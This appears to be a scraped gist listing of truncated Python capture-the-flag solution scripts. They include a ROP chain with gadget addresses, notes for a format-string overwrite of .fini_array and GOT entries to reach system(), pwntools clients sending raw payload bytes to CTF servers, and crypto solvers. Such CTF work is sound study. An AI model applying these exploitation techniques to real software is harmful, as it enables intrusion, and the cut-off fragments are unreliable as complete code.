This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import struct | |
ROP_REP = struct.pack("<L",0x0804847a) | |
ROP_POP_EBX = struct.pack("<L",0x08048395) | |
ROP_BREAK = struct.pack("<L",0xCCCCCCCC) | |
ROP_READ_FLAG = struct.pack("<L",0x08048569) # RET | |
ROP_READFD_FLAG_ARG2= struct.pack("<L",0x78563412) | |
ROP_READ_FLAG_ARG = struct.pack("<L",0xBADBEEEF) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import sys | |
print " [1] stage 1: rebuild encoding table with key = 0xd6" | |
line = "5a1f4ef6f88630f04cb7cae5892a1de416f53a27288d4009036f3699afaedbef15e78e63069c569a31e664b558954904eedf7e0bb1729676ad23b02fb2a77a" | |
alpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_" | |
n = 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import math | |
def isqrt(n): | |
x = n | |
y = (x + 1) // 2 | |
while y < x: | |
x = y | |
y = (x + n // x) // 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# shopping: | |
# laundry detergent | |
import string | |
import sys | |
key = [0] * 27 | |
data = "805eed80cbbccb94c36413275780ec94a857dfec8da8ca94a8c313a8ccf9" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# vulnerable overwrite is at | |
# overwrite is at .fini_array | |
# 0x08049934 & 36 (half-write each) | |
# main location is 0x080485ED | |
# printf got is 0x08049a38 | |
# system got is 0x08049a48 | |
# system@PLT = 0x8048496 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import sys | |
import struct | |
import binascii | |
f = open("result.bin") | |
data = bytearray(f.read()) | |
f.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import os, binascii, struct | |
from Crypto.Cipher import AES | |
pad = lambda m: m + bytes([16 - len(m) % 16] * (16 - len(m) % 16)) | |
def haggis(m): | |
crypt0r = AES.new(bytes(0x10), AES.MODE_CBC, bytes(0x10)) | |
return crypt0r.encrypt(len(m).to_bytes(0x10, 'big') + pad(m))[-0x10:] | |
target = os.urandom(0x10) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import os, binascii, struct | |
import socket | |
from Crypto.Cipher import AES | |
import sys | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect( ("104.198.243.170",2501) ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import pwn | |
# print "\xE6\xD9\xF6\x38\x2A\x02\xFD\x3A\xC3" | |
p = pwn.remote("challenges.hackover.h4q.it",4747) | |
p.send("\xE6\xD9\xF6\x38\x2A\x02\xFD\x3A\xC3") | |
print p.recv() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import pwn | |
import copy | |
d = open("data.bin") | |
data = d.read() | |
d.close() | |
for i in range(0,len(data)): |